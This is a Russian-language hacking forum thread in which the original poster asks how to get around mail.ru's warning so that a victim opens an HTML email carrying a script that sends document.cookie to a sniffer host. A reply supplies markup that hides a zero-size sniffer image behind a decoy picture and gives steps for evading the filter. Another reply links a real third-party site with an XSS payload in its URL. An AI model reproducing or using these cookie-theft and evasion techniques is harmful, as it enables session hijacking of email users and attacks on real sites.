Проблема в слудюещем: Я отправляю на почту жертвы (mail.ru) HTML-файл, в котором размещен скрипт для кражи куки HTML: <script>img = new Image(); img.src = "http://путь к снифферу"+document.cookie;</script> и когда жертва открывает письмо, то видит следующее: И резко передумывает открывать HTML-файл, как мне избежать этой красной предупредительной надписи?
Кто то может ответить навернека что конкретно и ка нужно сделать, и не флудить! ЗЫ: 2 diznt ссылка на сниффер закодирована!
На mail.ru ничего не сделаеш. Там защита и ее х*й обойдеш. Или мирись с этой табличкой или отправляй на другое мыло
эту защиту несколько дней назад только поставили, до этого все отправлялось, только тогда все в новом окне открывалось. если раньше как то обходили то и сейчас можно, вопрос времени.
есть у меня система одна но она вроде куки не ворует но на лог рефер выводит, + все происходит когда жертва открывает письмо мб кому пригодится, (только репу не понижать если х%р%ю напишу хD) PHP: //в имаге сорс устанавливаем путь к картинке сниффера <div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:0px; height:0px; z-index:0"><img src="http://*****/sniff/s.gif?id=1728&"+document.cookie; border=0 width=0 height=0></div> //в имаге сорс устанавливаем путь к картинке обычной <div id="image2" style="position:absolute; overflow:hidden; left:0px; top:0px; width:100px; height:100px; z-index:1"><img src="http://*****/img/ganibal.jpg" border=0 width=100 height=100></div> +пишем письмо в "обычном режиме" жмем расширенный, отправляем письмо в черновик, пишим кому, пишим тему, отправляем. самое интересное что этот хтмл код не фильтруется, в итоге жертве приходит письмо с картинкой, в моем случае это был ганибал (100x100) как вы поняли, жертва видит картинку и лог у нас уже на сниффе, почему нужна картинка? ибо если мы пошлем только картинку от снифа то чаще всего ее не видно а видно рамку изображения, что есстественно напугает "дичь", а так все красиво все рульно, можете еще оформить для красоты ) Ворует ли куки? Нет, но можно попытатся замутить ченить. а джава причем? если даже хреф ссылки иногда блокирует у меня опера, мозила, ие )
Что-то все жгут в данном топике. Всё просто - нет активной xss, знач не видать вам яваскрипта и не видать куков. Такой код мог не блочиться только наверное в первый месяц появления mail.ru, он примитивный и сейчас каждый почтовик его будет блочить. Не знаю как раньше вообще такой код мог проходить фильтр.
та да =) бросайте это дело и го пентагон ломать аффтор а это те иди ломай http://www.womandoctor.ru/search_file.php?search_string_file=%3CIMG%20%22%22%22%3E%3CSCRIPT%3Ealert(%22XSS%22)%3C/SCRIPT%3E%22%3E хD
